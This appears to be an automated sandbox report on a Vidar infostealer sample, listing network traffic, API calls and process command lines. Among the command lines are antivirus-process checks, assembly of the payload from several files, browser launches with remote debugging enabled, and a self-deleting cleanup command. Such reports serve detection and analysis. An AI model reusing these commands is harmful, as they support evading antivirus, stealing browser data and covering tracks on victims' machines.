                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49841 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49936 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50110 version: TLS 1.2
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_001AF7C7
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_001AF55C
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001C9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_001C9FD2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 12.2.Billion.com.4390000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0014FFE0 CloseHandle,NtProtectVirtualMemory,12_2_0014FFE0
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_001A4763
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00191B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00191B4D
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_0019F20D
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Windows\RespectExperimentsJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Windows\ClosureSurgeJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Windows\CollectiblesFerrariJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Windows\SandSublimedirectoryJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Windows\CorruptionEssentialJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Windows\ReservedSloveniaJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Windows\ChartAccessibleJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Windows\PriestRussianJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0015801712_2_00158017
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0014E14412_2_0014E144
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0013E1F012_2_0013E1F0
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0016A26E12_2_0016A26E
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001322AD12_2_001322AD
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0014C62412_2_0014C624
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0016E87F12_2_0016E87F
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001BC8A412_2_001BC8A4
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A2A0512_2_001A2A05
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00166ADE12_2_00166ADE
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00198BFF12_2_00198BFF
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0014CD7A12_2_0014CD7A
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0015CE1012_2_0015CE10
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0016715912_2_00167159
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0013924012_2_00139240
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001C531112_2_001C5311
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001396E012_2_001396E0
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0015170412_2_00151704
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00139B6012_2_00139B60
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00157B8B12_2_00157B8B
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00157DBA12_2_00157DBA
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\680662\Billion.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: String function: 00150DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: String function: 0014FD52 appears 40 times
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: String function: 004062CF appears 58 times
                Source: PodcastsTries.exeStatic PE information: invalid certificate
                Source: PodcastsTries.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.Billion.com.4390000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@104/289@25/16
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A41FA GetLastError,FormatMessageW,12_2_001A41FA
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00192010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00192010
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00191A0B AdjustTokenPrivileges,CloseHandle,12_2_00191A0B
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_0019DD87
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_001A3A0E
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\G7MTMI1G.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile created: C:\Users\user\AppData\Local\Temp\nsf49A9.tmpJump to behavior
                Source: PodcastsTries.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: QIWBS2NOP.12.dr, 6XLN7YM7G.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\PodcastsTries.exeFile read: C:\Users\user\Desktop\PodcastsTries.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PodcastsTries.exe "C:\Users\user\Desktop\PodcastsTries.exe"
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 680662
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Memo
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "OBTAINING" Compensation
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\680662\Billion.com Billion.com T
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2236,i,6734849523328560890,2082883044191278633,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2644,i,11626362328839299317,9747645851488831929,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2052,i,17749502471063055911,16474361137930384879,262144 /prefetch:3
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2412,i,5564331809908688110,6573540988472131423,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:3
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6356 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6704 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 680662Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E MemoJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "OBTAINING" Compensation Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard TJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\680662\Billion.com Billion.com TJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2236,i,6734849523328560890,2082883044191278633,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
